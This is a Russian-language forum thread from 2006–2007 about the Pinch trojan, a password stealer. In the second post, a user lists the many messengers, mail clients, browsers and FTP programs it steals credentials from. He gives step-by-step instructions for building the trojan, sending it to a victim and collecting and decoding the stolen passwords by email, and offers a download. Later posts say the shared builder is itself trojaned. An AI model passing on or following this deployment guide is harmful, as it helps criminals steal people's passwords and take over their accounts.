Вернуться   Foxter.ru > Мой компьютер > Сетевая безопасность

Ответ
 
Опции темы Опции просмотра
Старый 27.12.2006, 11:13   #36521  
Новичок
 
Аватар для splinter
 
Репутация: 1
Регистрация: 09.07.2006
Сообщения: 36
Счастье Пинч

Кто нибуть может? донести до моего ума че такое пинч и с чем его едят, ни че ни понимаю а хотелось бы
splinter вне форума   Ответить с цитированием
Старый 27.12.2006, 11:28   #36526  
FX maker
 
Аватар для J.Carot
 
Репутация: 42546Репутация: 42546Репутация: 42546Репутация: 42546Репутация: 42546Репутация: 42546Репутация: 42546Репутация: 42546Репутация: 42546Репутация: 42546Репутация: 42546
Регистрация: 19.01.2006
Адрес: Russian Federation
Сообщения: 955
По умолчанию

Цитата:
Pinch - это троянская программа, написанная на языке Ассемблера (masm), обладающая маленьким размером (около 20кб) и потрясающими возможностями.
Среди возможностей: похищение паролей от программ (im, mail, ftp, browser, etc).
Так же есть функции удаленного контроля, доступ к файловой системе, socks5, proxy, отправки скриншота, кейлоггер и другое.

Все полученные пароли высылаются одним файлом и затем расшифровываются специальной программой(Parser'ом).

Ворует пароли от:
- ICQ 99B-2002a
- ICQ 2003/Lite/5/Rambler
- Miranda IM
- TRILLIAN
- &RQ, RnQ, The Rat
- QIP
- GAIM
- MSN & Live Messenger
- The Bat!
- MS Office Outlook
- Mail.Ru Agent
- Becky
- Eudora
- Mozilla Thunderbird
- Gmail Notifier
- Opera
- Protected Storage(IE,Outlook Express)
- Mozilla Browser
- Mozilla Firefox
- RAS
- E-DIALER
- VDialer
- FAR
- Windows/Total Comander
- CuteFTP
- WS FTP
- FileZilla
- Flash FXP
- Smart FTP
- Coffee Cup FTP
- RapGet
- USDownloader
- RDP (Windows Remote Desktop(mstsc))

Инструкция:
1. Скачиваем архив
2. Регистрируем левое мыло на Mail.ru
3. Запускаем pinch3 Builder.exe конфигурируем
3.1. в поле E-Mail вводим мыло которое только что зарегели на мейл.ру
3.2. в поле User вводим логин от мыла (например: если зарегели 123@mail.ru То вводим 123)
3.3. вводим пароль от мыла которое недавно зарегестрировали
3.4. в другом поле E-Mail (Там где Reciever) вводим свой адрес куда слать отчеты
3.5. убираем галочку Compress Build....
3.6. Жмем кнопочку Build
4. Остальное можно не трогать
5. Запускаем сохраненный exe или засылаем жертве на твое мыло должен прийти report.bin(или как указал в билдере)
6. вставляешь файлик в C:\reports\ (если нету создай)
7. Запускай Parser2.exe и наслаждайся
Download
__________________
Promo?
J.Carot вне форума   Ответить с цитированием
Старый 30.12.2006, 17:24   #36788  
Новичок
 
Аватар для splinter
 
Репутация: 1
Регистрация: 09.07.2006
Сообщения: 36
Хорошо Благодарность :)))

J.Carot Благодарю,что так подробно обяснил! Тока вот у меня при скачивании антивирь задергался че делать игнарировать? Если не сложно скинь свою асю
splinter вне форума   Ответить с цитированием
Старый 30.12.2006, 17:56   #36789  
Новичок
 
Аватар для splinter
 
Репутация: 1
Регистрация: 09.07.2006
Сообщения: 36
Вопрос

Цитата:
Сообщение от splinter Посмотреть сообщение
J.Carot Благодарю,что так подробно обяснил! Тока вот у меня при скачивании антивирь задергался че делать игнарировать? Если не сложно скинь свою асю
Поясни плиз концовочку если не сложно Запускаем сохраненный exe или засылаем жертве на твое мыло? должен прийти report.bin(или как указал в билдере)
вставляешь файлик в C:\reports\ (если нету создай)
Запускай Parser2.exe и наслаждайся
splinter вне форума   Ответить с цитированием
Старый 10.01.2007, 14:01   #37376  
FX maker
 
Аватар для J.Carot
 
Репутация: 42546Репутация: 42546Репутация: 42546Репутация: 42546Репутация: 42546Репутация: 42546Репутация: 42546Репутация: 42546Репутация: 42546Репутация: 42546Репутация: 42546
Регистрация: 19.01.2006
Адрес: Russian Federation
Сообщения: 955
По умолчанию

Цитата:
Сообщение от splinter Посмотреть сообщение
Поясни плиз концовочку если не сложно Запускаем сохраненный exe или засылаем жертве на твое мыло? должен прийти report.bin(или как указал в билдере)
вставляешь файлик в C:\reports\ (если нету создай)
Запускай Parser2.exe и наслаждайся
Там все написано, причем понятней некуда,что еще объяснить )
Да многие программы такого контингента вопроинимаются антивирусами как опасная программа-вирус, к сожалению я ничего тебе конкретного про нею не могу больше сказать т.к. писал ее не я.
__________________
Promo?
J.Carot вне форума   Ответить с цитированием
Старый 10.01.2007, 17:13   #37392  
Модератор
 
Аватар для azalio
 
Репутация: 6476Репутация: 6476Репутация: 6476Репутация: 6476Репутация: 6476Репутация: 6476Репутация: 6476Репутация: 6476Репутация: 6476Репутация: 6476Репутация: 6476
Регистрация: 07.12.2005
Сообщения: 260
По умолчанию

Цитата:
Сообщение от J.Carot Посмотреть сообщение
Там все написано, причем понятней некуда,что еще объяснить )
Да многие программы такого контингента вопроинимаются антивирусами как опасная программа-вирус, к сожалению я ничего тебе конкретного про нею не могу больше сказать т.к. писал ее не я.
Да и исходников как я знаю нет в открытом доступе.
__________________
gtalk: azalio
azalio вне форума   Ответить с цитированием
Старый 12.01.2007, 11:50   #37568  
Новичок
 
Аватар для sniper1
 
Репутация: 1
Регистрация: 10.01.2007
Сообщения: 4
По умолчанию

http://ifolder.ru/591392 файл с подставой!!! В пинч билдере троян же сидит. То есть при попытке запуска файла pinch3 Builder.exe, запускается троян вшитый в pinch3 Builder.exe, и отправляются ваши пароли далеко далеко...
sniper1 вне форума   Ответить с цитированием
Старый 12.01.2007, 12:23   #37580  
Аццкая Сотона
 
Аватар для AntiGoth
 
Репутация: 292338Репутация: 292338Репутация: 292338Репутация: 292338Репутация: 292338Репутация: 292338Репутация: 292338Репутация: 292338Репутация: 292338Репутация: 292338Репутация: 292338
Регистрация: 30.10.2005
Сообщения: 694
По умолчанию

Цитата:
Сообщение от sniper1
В пинч билдере троян же сидит. То есть при попытке запуска файла pinch3 Builder.exe, запускается троян вшитый в pinch3 Builder.exe, и отправляются ваши пароли далеко далеко...
ээээ... ты это.. сам то понял что написал?! Читал описание программы-то?!

Цитата:
Сообщение от J.Carot
Pinch - это троянская программа
__________________
Я не псих. У меня даже в мед.карте написано:
"Психических заболеваний нет. Просто дурак."
AntiGoth вне форума   Ответить с цитированием
Старый 12.01.2007, 12:34   #37586  
Новичок
 
Аватар для sniper1
 
Репутация: 1
Регистрация: 10.01.2007
Сообщения: 4
По умолчанию

Да блин не понятно чтоль? посмотри файл pinch3 Builder.exe
Размер 151 КБ (154*624 байт) А должен быть размер 82,5 КБ (84*497 байт)
В ваш файл что дали вшит троян ПИНЧ....

При запуске вашего файла pinch3 Builder.exe файл распаковывается сюда
C:\WINDOWS\Temp
там создаются два файла svchost.exe(троян который отсылает ваши пассы) и сам pinch3 Builder.exe нормального размера....

Ещё нужна информация? теперь то верите?
sniper1 вне форума   Ответить с цитированием
Старый 12.01.2007, 12:42   #37591  
FX maker
 
Аватар для J.Carot
 
Репутация: 42546Репутация: 42546Репутация: 42546Репутация: 42546Репутация: 42546Репутация: 42546Репутация: 42546Репутация: 42546Репутация: 42546Репутация: 42546Репутация: 42546
Регистрация: 19.01.2006
Адрес: Russian Federation
Сообщения: 955
По умолчанию

Цитата:
Сообщение от sniper1 Посмотреть сообщение
Да блин не понятно чтоль? посмотри файл pinch3 Builder.exe
Размер 151 КБ (154*624 байт) А должен быть размер 82,5 КБ (84*497 байт)
В ваш файл что дали вшит троян ПИНЧ....

При запуске вашего файла pinch3 Builder.exe файл распаковывается сюда
C:\WINDOWS\Temp
там создаются два файла svchost.exe(троян который отсылает ваши пассы) и сам pinch3 Builder.exe нормального размера....

Ещё нужна информация? теперь то верите?
Я непойму, откуда ты знаешь какой размер должен быть у программы, у тебя есть оригинал, прикрепи его как вложение и мы сравним разницу.
__________________
Promo?
J.Carot вне форума   Ответить с цитированием
Ответ


Здесь присутствуют: 1 (пользователей - 0 , гостей - 1)
 
Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать темы
Вы не можете отвечать на сообщения
Вы не можете прикреплять файлы
Вы не можете редактировать сообщения

BB-коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Быстрый переход



Powered by vBulletin
Copyright ©2000-2024, Jelsoft Enterprises Ltd.
[Foxter Skin] developed by: Foxter.ru